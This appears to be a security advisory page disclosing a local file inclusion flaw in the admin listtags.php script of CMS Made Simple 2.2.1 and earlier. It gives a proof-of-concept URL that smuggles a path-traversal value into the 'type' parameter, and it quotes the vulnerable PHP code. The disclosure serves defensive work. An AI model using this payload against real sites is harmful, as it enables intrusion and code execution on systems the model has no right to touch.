CMS Made Simple 2.2.1 Local File Inclusion

2017.07.04
Credit: Zhiyang Zeng
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-98

======= Details ======= Software:cmsmadesimple Homepage:http://www.cmsmadesimple.org/ version:<=2.2.1 description:The File Inclusion vulnerability allows an attacker to include a file, usually exploiting a "dynamic file inclusion" mechanisms implemented in the target application. The vulnerability occurs due to the use of user-supplied input without proper validation. ======== PoC: ======== For cmsmadesimple <=2.1.6: The Vulnerability is existing in /cmsms/admin/listtags.php Line 82 and line 54 If there is a file named "1.phpinfo.php" in http://127.0.0.1/1.phpinfo.php So when we visit the following link: http://127.0.0.1/cmsms/admin/listtags.php?_sk_=08852e62af02bc03&action=showpluginhelp http://127.0.0.1/cmsms/admin/listtags.php?_sk_=08852e62af02bc03&action=showpluginhelp&plugin=phpinfo& type=../../1 local file inclusion successfully! For cmsmadesimple <=2.2.1: Current version is still vulnerable. if ($action == "showpluginhelp") { $content = ''; $file = $find_file("$type.$plugin.php"); if( is_file($file) ) require_once($file); ========= Reference ========== https://lightrains.org/local-file-inclusion-in-cmsmadesimple/


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top